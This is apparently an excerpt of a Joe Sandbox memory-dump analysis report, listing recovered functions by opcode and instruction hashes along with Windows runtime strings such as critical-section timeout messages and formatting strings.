                                                                                                                      • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                      • Instruction Fuzzy Hash: 5D81D030F052899FDF248E68C8917FEBBB1AF55B50F1A4119E861A7398F734B841CB54
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$[$]:%u
                                                                                                                      • API String ID: 48624451-2819853543
                                                                                                                      • Opcode ID: 7555bab9236123b390b441f531a5b10ae1fe14dd414b5979cbc14acdc1a3f83f
                                                                                                                      • Instruction ID: a2a853d9f3c249571ffd01197df40a12287b75874b0a2744807d238137c56a0b
                                                                                                                      • Opcode Fuzzy Hash: 7555bab9236123b390b441f531a5b10ae1fe14dd414b5979cbc14acdc1a3f83f
                                                                                                                      • Instruction Fuzzy Hash: CB215376E00119ABDB10DFA9C844AFEB7E9EF84684F14016AF905E3301F730EA11CBA5
                                                                                                                      Strings
                                                                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047002E7
                                                                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047002BD
                                                                                                                      • RTL: Re-Waiting, xrefs: 0470031E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                      • API String ID: 0-2474120054
                                                                                                                      • Opcode ID: 78efc76b8119b0ac604374b4abdd8dd8d0c8119889a048ecca0ccc3079d9fba6
                                                                                                                      • Instruction ID: f874ad50c5ffb2585c1e3697ea78e4b09c8a06dd88196e5f1e797b6366ef1418
                                                                                                                      • Opcode Fuzzy Hash: 78efc76b8119b0ac604374b4abdd8dd8d0c8119889a048ecca0ccc3079d9fba6
                                                                                                                      • Instruction Fuzzy Hash: D3E1A030604741DFD729CF28D984B5AB7E0AB48324F144A6DE5A5C73E1E774E985CB82
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 04707B8E
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04707B7F
                                                                                                                      • RTL: Re-Waiting, xrefs: 04707BAC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      • Opcode ID: eacb1d85b3802e69fe1d98ea9dd5170569c39ebd011faa44bfe71476a1904d5d
                                                                                                                      • Instruction ID: 7e06d5239b18304c81aacf292c1a768456d91f8a17bc93d4c23bebe425f6c073
                                                                                                                      • Opcode Fuzzy Hash: eacb1d85b3802e69fe1d98ea9dd5170569c39ebd011faa44bfe71476a1904d5d
                                                                                                                      • Instruction Fuzzy Hash: 1841E2317017029FD724DE29D841B6AB7E5EF88B14F000A2DF96ADB780EB30F8058B91
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0470728C
                                                                                                                      Strings
                                                                                                                      • RTL: Resource at %p, xrefs: 047072A3
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04707294
                                                                                                                      • RTL: Re-Waiting, xrefs: 047072C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      • Opcode ID: 5bb26fc34ad5ef9adfe11e36ede5c0be04ff29a47946adaa8e7e857cf3e25b63
                                                                                                                      • Instruction ID: 9841b91c6ea68d6b84110e1a7c88ef9da8323496dc29763ded58ab125dade29d
                                                                                                                      • Opcode Fuzzy Hash: 5bb26fc34ad5ef9adfe11e36ede5c0be04ff29a47946adaa8e7e857cf3e25b63
                                                                                                                      • Instruction Fuzzy Hash: 8A41FF31705216ABD724DF25CD42B6AB7E5FB84B18F10861DF955AB380EB30F8528BD1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: %%%u$]:%u
                                                                                                                      • API String ID: 48624451-3050659472
                                                                                                                      • Opcode ID: f3edd0546773bafa391650d35b062aff9a868e01e2b3daca673461e692f9616a
                                                                                                                      • Instruction ID: 5eff9ef32dd609c7a8440585b84c89230661f3c90e9c2c39cb34783a4ed972b7
• Opcode Fuzzy Hash: f3edd0546773bafa391650d35b062aff9a868e01e2b3daca673461e692f9616a
• Instruction Fuzzy Hash: 16317372A00219AFDB20DF29CC44BFEB7B8EB44750F544599E849E3201EB30BA548BA1
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction ID: 645bd971d5d5f1e468396ef5aac0f266c14654bab41a487a8df107ff4b9e27f2
• Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
• Instruction Fuzzy Hash: 2591A370E0021A9BDF38DE69C881ABEB7A5EF54326F54451AE865E73C0F730B941C762
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3539634136.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
• Associated: 0000000A.00000002.3539634136.0000000004789000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.000000000478D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3539634136.00000000047FE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4660000_sdchange.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 2d9dd9fcb47831ff99030d765dddbdc97e230d4c212a75bbda58d3a6ee1048cc
• Instruction ID: 072776ded1d16360e10f3b07f96454a5e38d3d8d1e1bf9a82d717842c0732fec
• Opcode Fuzzy Hash: 2d9dd9fcb47831ff99030d765dddbdc97e230d4c212a75bbda58d3a6ee1048cc
• Instruction Fuzzy Hash: 0C810CB1D002699BDB35CB54CC54BEAB7B8AB08714F0041EAEA19B7340E7716E85CFA4